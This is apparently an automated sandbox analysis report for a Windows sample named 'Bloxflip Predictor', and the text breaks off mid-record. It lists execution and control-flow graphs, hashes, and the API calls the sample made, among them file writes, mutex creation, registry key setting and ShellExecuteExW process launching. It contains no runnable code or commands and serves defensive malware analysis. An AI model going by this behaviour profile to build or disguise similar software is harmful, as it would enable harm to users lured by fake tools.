                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:60
                                            Total number of Limit Nodes:3
                                            execution_graph 2090 bfab1e 2091 bfab4a SetErrorMode 2090->2091 2092 bfab73 2090->2092 2093 bfab5f 2091->2093 2092->2091 2094 bfa25e 2095 bfa28a CloseHandle 2094->2095 2097 bfa2c9 2094->2097 2096 bfa298 2095->2096 2097->2095 2138 bfa23c 2139 bfa25e CloseHandle 2138->2139 2141 bfa298 2139->2141 2166 bfaafc 2167 bfab1e SetErrorMode 2166->2167 2169 bfab5f 2167->2169 2150 bfb01b 2152 bfb052 CreateFileW 2150->2152 2153 bfb0d9 2152->2153 2098 bfb2fa 2099 bfb32f WriteFile 2098->2099 2101 bfb361 2099->2101 2102 bfb67a 2103 bfb6a9 WaitForInputIdle 2102->2103 2105 bfb6df 2102->2105 2104 bfb6b7 2103->2104 2105->2103 2154 bfa51a 2155 bfa54e GetTokenInformation 2154->2155 2157 bfa5c0 2155->2157 2178 bfb2da 2179 bfb2fa WriteFile 2178->2179 2181 bfb361 2179->2181 2182 bfb658 2183 bfb67a WaitForInputIdle 2182->2183 2185 bfb6b7 2183->2185 2170 bfb6f5 2171 bfb722 RegOpenKeyExW 2170->2171 2173 bfb7b0 2171->2173 2110 bfb052 2112 bfb08a CreateFileW 2110->2112 2113 bfb0d9 2112->2113 2142 bfae32 2143 bfae66 CreateMutexW 2142->2143 2145 bfaee1 2143->2145 2146 bfb128 2147 bfb16a GetFileType 2146->2147 2149 bfb1cc 2147->2149 2126 bfb486 2128 bfb4ac ShellExecuteExW 2126->2128 2129 bfb4c8 2128->2129 2130 bfae66 2132 bfae9e CreateMutexW 2130->2132 2133 bfaee1 2132->2133 2174 bfb464 2177 bfb486 ShellExecuteExW 2174->2177 2176 bfb4c8 2177->2176 2158 bfac82 2159 bfaca6 RegSetValueExW 2158->2159 2161 bfad27 2159->2161 2162 bfab81 2163 bfabb2 RegQueryValueExW 2162->2163 2165 bfac3b 2163->2165

                                            Callgraph

                                            • Executed
                                            • Not Executed
                                            • Opacity -> Relevance
                                            • Disassembly available
                                            callgraph 0 Function_01020F02 1 Function_01021300 2 Function_00BF23BC 3 Function_01020006 4 Function_00BFABB2 5 Function_00BFA9B2 6 Function_00BFA4AA 7 Function_00BFA7AA 8 Function_00BFACA6 9 Function_00BFA3A6 10 Function_00BFB5A5 11 Function_00BFB3A3 12 Function_00FF05DF 13 Function_00BFA09A 14 Function_00BF2098 15 Function_00FF05D8 16 Function_00BF2194 17 Function_00BFAF92 18 Function_0102072C 18->12 18->18 22 Function_01020C30 18->22 31 Function_0102093D 18->31 67 Function_01020A92 18->67 69 Function_01020B93 18->69 73 Function_0102089A 18->73 98 Function_010205D1 18->98 114 Function_00FF0606 18->114 19 Function_00FF05D0 20 Function_00BFAD8E 21 Function_00BF268D 23 Function_00BFA988 24 Function_00FF05C8 25 Function_00BFB486 26 Function_01021238 27 Function_00BFAA82 28 Function_00BFAC82 29 Function_00BFAB81 30 Function_00BFA380 32 Function_00FF05C0 33 Function_00BFA6FD 34 Function_00BFAAFC 35 Function_00BFB2FA 36 Function_00BFB7FA 37 Function_00BFB1F8 38 Function_00FF05B8 39 Function_00BFB6F5 40 Function_00BF23F4 41 Function_00BFA1F4 42 Function_00BF21F0 43 Function_01020F50 44 Function_00FF07AD 45 Function_00FF04AA 46 Function_00BFB3DE 47 Function_01020360 47->12 47->18 47->98 47->114 48 Function_00BFB2DA 49 Function_00BFA2D7 50 Function_00BFA7D6 51 Function_00BF20D0 52 Function_00BFB2D0 53 Function_01020370 53->12 53->18 53->98 53->114 54 Function_01021279 55 Function_00FF067F 56 Function_00BF213C 57 Function_00BFA23C 58 Function_00BFB53A 59 Function_00BFAA38 60 Function_00BFA736 61 Function_00FF0074 62 Function_00BFAE32 63 Function_0102108F 64 Function_00BF2531 65 Function_00BF2430 66 Function_00BFAF30 68 Function_00BFA02E 70 Function_00BFB22A 71 Function_00FF066A 72 Function_00BFB128 74 Function_00BFB722 75 Function_00BFA120 76 Function_00BFAB1E 77 Function_00FF005C 78 Function_00BFB01B 79 Function_00BFA51A 80 Function_010205AC 80->12 80->18 80->98 80->114 81 Function_00BF2310 82 Function_00FF064F 82->71 83 Function_00BFA60B 84 Function_00BFA30A 85 Function_00BFB60A 86 Function_00BFB507 87 Function_010212BA 88 Function_00BF2006 89 Function_00BFA005 90 Function_00FF0040 91 Function_00FF0740 92 Function_00BF257F 93 Function_00BFAC7C 94 Function_00BFB67A 95 Function_00BFA078 96 Function_00BFA172 97 Function_00BFA86E 98->12 98->18 98->22 98->31 98->67 98->69 98->73 98->98 98->114 99 Function_00BFB16A 100 Function_00BFA46A 101 Function_00BFAE66 102 Function_00BF2264 103 Function_00BF2364 104 Function_00BFB464 105 Function_00BFAD60 106 Function_00BFA25E 107 Function_00BF2458 108 Function_00BFB658 109 Function_00BFB052 110 Function_00BFB451 111 Function_00FF0710 112 Function_00BFA54E 113 Function_01020FF6 115 Function_00BFA646 116 Function_00BF2044 117 Function_00BFA844 118 Function_00FF0000
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2145072711.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1020000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3c8fac3f277b232fd679e5530b468e5dd8641bda14b2339aefd48fe13f5f5196
                                            • Instruction ID: 976bb9e853410458b01f6ebcf63f5a546d3a11bc3f80f10c1614af60748a31d8
                                            • Opcode Fuzzy Hash: 3c8fac3f277b232fd679e5530b468e5dd8641bda14b2339aefd48fe13f5f5196
                                            • Instruction Fuzzy Hash: 7851BF31B00204ABEF18EB759C11BAE36A3EBD5358F154538E205EF7E8DE359D0687A1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2145072711.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1020000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 03fe219b347403c888d66814e30504b851c3d9e03ad3ce97534189a529acc850
                                            • Instruction ID: 2843804dd7031a7c4b4a47442dd20c65c8902e0d80767132b785348ea02b2397
                                            • Opcode Fuzzy Hash: 03fe219b347403c888d66814e30504b851c3d9e03ad3ce97534189a529acc850
                                            • Instruction Fuzzy Hash: BD519131B00204ABDF18EB759C11B6E36A3EBD5358F154538E205EF7D8DE35AD0687A1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 bfb01b-bfb0aa 4 bfb0af-bfb0bb 0->4 5 bfb0ac 0->5 6 bfb0bd 4->6 7 bfb0c0-bfb0c9 4->7 5->4 6->7 8 bfb0cb-bfb0ef CreateFileW 7->8 9 bfb11a-bfb11f 7->9 12 bfb121-bfb126 8->12 13 bfb0f1-bfb117 8->13 9->8 12->13
                                            APIs
                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00BFB0D1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: b6cca0b7915aceaad370592bc45373aefe986e2e0a24220c876f7eed7929f16c
                                            • Instruction ID: 4a62f5f0169a2b1ebd72e216cd3dd8aca046f79e9c979f159222b26ccfea59bb
                                            • Opcode Fuzzy Hash: b6cca0b7915aceaad370592bc45373aefe986e2e0a24220c876f7eed7929f16c
                                            • Instruction Fuzzy Hash: 4831AFB1505384AFE722CB25CC40FA2BFE8EF16314F08849AE9858B252D375E909CB71

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 16 bfae32-bfaeb5 20 bfaeba-bfaec3 16->20 21 bfaeb7 16->21 22 bfaec8-bfaed1 20->22 23 bfaec5 20->23 21->20 24 bfaed3-bfaef7 CreateMutexW 22->24 25 bfaf22-bfaf27 22->25 23->22 28 bfaf29-bfaf2e 24->28 29 bfaef9-bfaf1f 24->29 25->24 28->29
                                            APIs
                                            • CreateMutexW.KERNELBASE(?,?), ref: 00BFAED9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID:
                                            • API String ID: 1964310414-0
                                            • Opcode ID: 8131d2676953dfaf1739147b67189ad0e05c64bb0769709bf84880918038e78a
                                            • Instruction ID: 341d72dbb66b6104b4a4810bb248600aeac537b76ac5b72dae4b96dfeb65f174
                                            • Opcode Fuzzy Hash: 8131d2676953dfaf1739147b67189ad0e05c64bb0769709bf84880918038e78a
                                            • Instruction Fuzzy Hash: 8B3190B15093846FE722CB25CC44B96BFF8EF16314F08849AE948CF292D334E808C762

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 32 bfa51a-bfa5b0 37 bfa5fd-bfa602 32->37 38 bfa5b2-bfa5ba GetTokenInformation 32->38 37->38 39 bfa5c0-bfa5d2 38->39 41 bfa604-bfa609 39->41 42 bfa5d4-bfa5fa 39->42 41->42
                                            APIs
                                            • GetTokenInformation.KERNELBASE(?,00000E24,C53FB55A,00000000,00000000,00000000,00000000), ref: 00BFA5B8
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: InformationToken
                                            • String ID:
                                            • API String ID: 4114910276-0
                                            • Opcode ID: b068d2709c1cead5cf3f6e6695126f6bae1309ea91ddadfc96cd7a5df07c3077
                                            • Instruction ID: 3867ed8cf4c19b4759bb6f7dac9459f6cd168c4e5937a3e0e320f54dca2e4249
                                            • Opcode Fuzzy Hash: b068d2709c1cead5cf3f6e6695126f6bae1309ea91ddadfc96cd7a5df07c3077
                                            • Instruction Fuzzy Hash: 7D3193715093846FD7228B65DC54FA6BFB8EF16314F0884DBE985CB152D225E908C7B2

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 45 bfb6f5-bfb77d 49 bfb77f 45->49 50 bfb782-bfb799 45->50 49->50 52 bfb7db-bfb7e0 50->52 53 bfb79b-bfb7ae RegOpenKeyExW 50->53 52->53 54 bfb7e2-bfb7e7 53->54 55 bfb7b0-bfb7d8 53->55 54->55
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(?,00000E24), ref: 00BFB7A1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: 6d59b1aeea19a54ca05d2f4150f325261d63612c641091e8addb00b0a604c3d4
                                            • Instruction ID: 05e20eb54e9565da90ed813155e62cb0fc7041ad7adbf89cfba1d4cf439d6239
                                            • Opcode Fuzzy Hash: 6d59b1aeea19a54ca05d2f4150f325261d63612c641091e8addb00b0a604c3d4
                                            • Instruction Fuzzy Hash: 72318072405344AFE7229B61CC84FA6BFFCEF55314F08849AE9858B652D325E94CCB71

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 60 bfab81-bfabef 63 bfabf4-bfabfd 60->63 64 bfabf1 60->64 65 bfabff 63->65 66 bfac02-bfac08 63->66 64->63 65->66 67 bfac0d-bfac24 66->67 68 bfac0a 66->68 70 bfac5b-bfac60 67->70 71 bfac26-bfac39 RegQueryValueExW 67->71 68->67 70->71 72 bfac3b-bfac58 71->72 73 bfac62-bfac67 71->73 73->72
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,C53FB55A,00000000,00000000,00000000,00000000), ref: 00BFAC2C
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            • Opcode ID: b6fb0b2963dbb2385efe73f60ab5f64eec5f641d20326012dd0a22b2019ed87c
                                            • Instruction ID: 9e9aa880891672f13678fa52288609038e5159423cf88e589b63d13dfddf8963
                                            • Opcode Fuzzy Hash: b6fb0b2963dbb2385efe73f60ab5f64eec5f641d20326012dd0a22b2019ed87c
                                            • Instruction Fuzzy Hash: B93180B5505744AFD722CB15CC44FA2BFF8EF15710F0884DAE949CB252D324E908CB62

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 77 bfb128-bfb1b5 81 bfb1ea-bfb1ef 77->81 82 bfb1b7-bfb1ca GetFileType 77->82 81->82 83 bfb1cc-bfb1e9 82->83 84 bfb1f1-bfb1f6 82->84 84->83
                                            APIs
                                            • GetFileType.KERNELBASE(?,00000E24,C53FB55A,00000000,00000000,00000000,00000000), ref: 00BFB1BD
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID:
                                            • API String ID: 3081899298-0
                                            • Opcode ID: 75f95cd6524890faf0f753e6e4923d54aa964d014002d4fdaa8391af02469016
                                            • Instruction ID: 95098adc50161a8662f7ae8687e8f6c38b960b3aa7fd3906c0f36ce488bc59e2
                                            • Opcode Fuzzy Hash: 75f95cd6524890faf0f753e6e4923d54aa964d014002d4fdaa8391af02469016
                                            • Instruction Fuzzy Hash: 7A2107B54093806FE7138B25DC41BA2BFBCEF57724F0881D6E9848B293D264A909C771

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 88 bfac82-bface3 91 bface8-bfacf4 88->91 92 bface5 88->92 93 bfacf9-bfad10 91->93 94 bfacf6 91->94 92->91 96 bfad47-bfad4c 93->96 97 bfad12-bfad25 RegSetValueExW 93->97 94->93 96->97 98 bfad4e-bfad53 97->98 99 bfad27-bfad44 97->99 98->99
                                            APIs
                                            • RegSetValueExW.KERNELBASE(?,00000E24,C53FB55A,00000000,00000000,00000000,00000000), ref: 00BFAD18
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 64a208b2bce5415f5d2105df97362646de43db324be041f56887c769bc78889a
                                            • Instruction ID: f24904b61a240128010e2b554001c1327abdd6b0626e018f88c1aa01b76aebae
                                            • Opcode Fuzzy Hash: 64a208b2bce5415f5d2105df97362646de43db324be041f56887c769bc78889a
                                            • Instruction Fuzzy Hash: 062192B65053846FD7228B11CC44FA7BFFCEF55714F08849AE945CB652D264E848C771

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 103 bfb052-bfb0aa 106 bfb0af-bfb0bb 103->106 107 bfb0ac 103->107 108 bfb0bd 106->108 109 bfb0c0-bfb0c9 106->109 107->106 108->109 110 bfb0cb-bfb0d3 CreateFileW 109->110 111 bfb11a-bfb11f 109->111 113 bfb0d9-bfb0ef 110->113 111->110 114 bfb121-bfb126 113->114 115 bfb0f1-bfb117 113->115 114->115
                                            APIs
                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00BFB0D1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: b9cf0fc88de7e7460c3131ccb31034722624d7bf4d12328e9bdd225e1b464905
                                            • Instruction ID: c6f9d4ff49db2d1a2adfd738cd8410d6580346494cdfd1ecfa013559b05082fb
                                            • Opcode Fuzzy Hash: b9cf0fc88de7e7460c3131ccb31034722624d7bf4d12328e9bdd225e1b464905
                                            • Instruction Fuzzy Hash: 30219271500204AFEB21DF65DD85F66FBE8EF18314F0488AAEA498B751D775E408CB71

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 118 bfb722-bfb77d 121 bfb77f 118->121 122 bfb782-bfb799 118->122 121->122 124 bfb7db-bfb7e0 122->124 125 bfb79b-bfb7ae RegOpenKeyExW 122->125 124->125 126 bfb7e2-bfb7e7 125->126 127 bfb7b0-bfb7d8 125->127 126->127
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(?,00000E24), ref: 00BFB7A1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: 777d8a23224ca296a744ea200245869d8599bd01ce639b617f87d42ded9c6bdd
                                            • Instruction ID: 9bd715d43c38a00e1dc9ca7809f022461898bf03e4513eb2f1e022ecc2967b76
                                            • Opcode Fuzzy Hash: 777d8a23224ca296a744ea200245869d8599bd01ce639b617f87d42ded9c6bdd
                                            • Instruction Fuzzy Hash: A621A472500208AFE7219F55CC84FABF7ECEF68714F14845AEA458B651D774E90C8BB1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 132 bfae66-bfaeb5 135 bfaeba-bfaec3 132->135 136 bfaeb7 132->136 137 bfaec8-bfaed1 135->137 138 bfaec5 135->138 136->135 139 bfaed3-bfaedb CreateMutexW 137->139 140 bfaf22-bfaf27 137->140 138->137 141 bfaee1-bfaef7 139->141 140->139 143 bfaf29-bfaf2e 141->143 144 bfaef9-bfaf1f 141->144 143->144
                                            APIs
                                            • CreateMutexW.KERNELBASE(?,?), ref: 00BFAED9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID:
                                            • API String ID: 1964310414-0
                                            • Opcode ID: a450bd4b990b1c646ad3e89675c4bebaf3a9bd88738f0424697725bce0c54916
                                            • Instruction ID: ab58948a6a1c7d09e9f6274ee729509445dd61715f8b8f4d37b93633c441d41a
                                            • Opcode Fuzzy Hash: a450bd4b990b1c646ad3e89675c4bebaf3a9bd88738f0424697725bce0c54916
                                            • Instruction Fuzzy Hash: A62195B15052049FEB24DF25DD85BA6FBE8EF14314F148499EA48CF741D775E808CA72

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 147 bfb2da-bfb351 151 bfb395-bfb39a 147->151 152 bfb353-bfb373 WriteFile 147->152 151->152 155 bfb39c-bfb3a1 152->155 156 bfb375-bfb392 152->156 155->156
                                            APIs
                                            • WriteFile.KERNELBASE(?,00000E24,C53FB55A,00000000,00000000,00000000,00000000), ref: 00BFB359
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: 24cf1378cafdb2e2716f2229b83a07c7c94854414186a036ac21699edd812cc3
                                            • Instruction ID: 64a7001835598319e82dee2609ede38bd367a828bb792a15005eefa9d886472e
                                            • Opcode Fuzzy Hash: 24cf1378cafdb2e2716f2229b83a07c7c94854414186a036ac21699edd812cc3
                                            • Instruction Fuzzy Hash: AD219F71409384AFDB22CF51DC44FA7BFB8EF55724F08849AEA498B552C335A508CBB6

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 171 bfabb2-bfabef 173 bfabf4-bfabfd 171->173 174 bfabf1 171->174 175 bfabff 173->175 176 bfac02-bfac08 173->176 174->173 175->176 177 bfac0d-bfac24 176->177 178 bfac0a 176->178 180 bfac5b-bfac60 177->180 181 bfac26-bfac39 RegQueryValueExW 177->181 178->177 180->181 182 bfac3b-bfac58 181->182 183 bfac62-bfac67 181->183 183->182
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,C53FB55A,00000000,00000000,00000000,00000000), ref: 00BFAC2C
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            • Opcode ID: 00bcd107aa87f52449fbb1bed63e785a42a8ece2c7dc3c5b259856809d316bba
                                            • Instruction ID: 34242952e1a0ae32c5acd7c5b2ae26cdb2278a8bb2b48e058a40f29310e67b96
                                            • Opcode Fuzzy Hash: 00bcd107aa87f52449fbb1bed63e785a42a8ece2c7dc3c5b259856809d316bba
                                            • Instruction Fuzzy Hash: B42193B55002049FE721CF15CC84FA6B7ECEF24714F04C49AEA49CB651D764E908CA72

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 159 bfa54e-bfa5b0 163 bfa5fd-bfa602 159->163 164 bfa5b2-bfa5ba GetTokenInformation 159->164 163->164 165 bfa5c0-bfa5d2 164->165 167 bfa604-bfa609 165->167 168 bfa5d4-bfa5fa 165->168 167->168
                                            APIs
                                            • GetTokenInformation.KERNELBASE(?,00000E24,C53FB55A,00000000,00000000,00000000,00000000), ref: 00BFA5B8
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: InformationToken
                                            • String ID:
                                            • API String ID: 4114910276-0
                                            • Opcode ID: 4534b9159d1e8775e1ab3a933fb99f94535c7f7d0ce460f02a931ca7f74dc3d6
                                            • Instruction ID: d3cb2858b130cab1f5eff38656b85d5cf30b49c21d80a2ee5552162ea6c1ac73
                                            • Opcode Fuzzy Hash: 4534b9159d1e8775e1ab3a933fb99f94535c7f7d0ce460f02a931ca7f74dc3d6
                                            • Instruction Fuzzy Hash: 8A11A5B1500204AFEB21CF55DC44FAAB7ECEF24714F04845AE949CB651D774E5488BB1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 187 bfaca6-bface3 189 bface8-bfacf4 187->189 190 bface5 187->190 191 bfacf9-bfad10 189->191 192 bfacf6 189->192 190->189 194 bfad47-bfad4c 191->194 195 bfad12-bfad25 RegSetValueExW 191->195 192->191 194->195 196 bfad4e-bfad53 195->196 197 bfad27-bfad44 195->197 196->197
                                            APIs
                                            • RegSetValueExW.KERNELBASE(?,00000E24,C53FB55A,00000000,00000000,00000000,00000000), ref: 00BFAD18
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 3bd774d3a2deee45c92adb0c26f157688974793649342b114ae4d0371cc3ff5c
                                            • Instruction ID: 255ad005b67ddeee9323f2907247ba592e4f8ec3af32297bee63a43de7cbdbdc
                                            • Opcode Fuzzy Hash: 3bd774d3a2deee45c92adb0c26f157688974793649342b114ae4d0371cc3ff5c
                                            • Instruction Fuzzy Hash: 851184B5500204AFEB318E15CC41FA6BBECEF24714F1484AAEE498BA51D775E808CA72

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 201 bfb2fa-bfb351 204 bfb395-bfb39a 201->204 205 bfb353-bfb35b WriteFile 201->205 204->205 207 bfb361-bfb373 205->207 208 bfb39c-bfb3a1 207->208 209 bfb375-bfb392 207->209 208->209
                                            APIs
                                            • WriteFile.KERNELBASE(?,00000E24,C53FB55A,00000000,00000000,00000000,00000000), ref: 00BFB359
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: 06fd925d677667153cf710d1fa17a8da6f2a41ac5a3b1e9bd707337752e34555
                                            • Instruction ID: 8112c6b255509c2d3514abca5f7431db8c5f29bd5089e78ca4ab6d1267a59d10
                                            • Opcode Fuzzy Hash: 06fd925d677667153cf710d1fa17a8da6f2a41ac5a3b1e9bd707337752e34555
                                            • Instruction Fuzzy Hash: 0B11C471500304AFEB21CF51DC44FA6FBE8EF24724F14849AEA498B651C775E408CBB5
                                            APIs
                                            • ShellExecuteExW.SHELL32(?), ref: 00BFB4C0
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ExecuteShell
                                            • String ID:
                                            • API String ID: 587946157-0
                                            • Opcode ID: 2e63c31e451f7db3a248feb6c4588f5adb3e584475eb6424d999c07512126d77
                                            • Instruction ID: ed5b05bc4fa905feb6eb3237c67d05def30ec53be5dae15cc71fd8c51c185eef
                                            • Opcode Fuzzy Hash: 2e63c31e451f7db3a248feb6c4588f5adb3e584475eb6424d999c07512126d77
                                            • Instruction Fuzzy Hash: 0F115E715093849FDB12CF25DD94B52BFE8DF46320F0884EAED49CB252D264E808CB62
                                            APIs
                                            • GetFileType.KERNELBASE(?,00000E24,C53FB55A,00000000,00000000,00000000,00000000), ref: 00BFB1BD
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID:
                                            • API String ID: 3081899298-0
                                            • Opcode ID: a8b49606302ed10b85b55d439b89bb6ac0bfa8184057d28550aedb7aac86546b
                                            • Instruction ID: b25c34f97a0bd1532eec190f46220ab92aa6dd9966f2686731894233f9d883d2
                                            • Opcode Fuzzy Hash: a8b49606302ed10b85b55d439b89bb6ac0bfa8184057d28550aedb7aac86546b
                                            • Instruction Fuzzy Hash: A701C071510204AEEB218B05DC85FA6B7E8DF25724F14C096EE099B741D774EA0CCAB1
                                            APIs
                                            • WaitForInputIdle.USER32(?,?), ref: 00BFB6AF
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: IdleInputWait
                                            • String ID:
                                            • API String ID: 2200289081-0
                                            • Opcode ID: 0d276dabcc7b0128f2ea60e8cc1c6b413e3aee734a1355da25908a8128474e65
                                            • Instruction ID: 0e5f7738e8de84dc49d6ee7d797b1e45572658b93a796d1c33ec88605206a532
                                            • Opcode Fuzzy Hash: 0d276dabcc7b0128f2ea60e8cc1c6b413e3aee734a1355da25908a8128474e65
                                            • Instruction Fuzzy Hash: 9A117371509384AFDB11CF55DD84B52FFE4EF46320F0984DADD458F262D275A808CB61
                                            APIs
                                            • SetErrorMode.KERNELBASE(?), ref: 00BFAB50
                                            Memory Dump Source
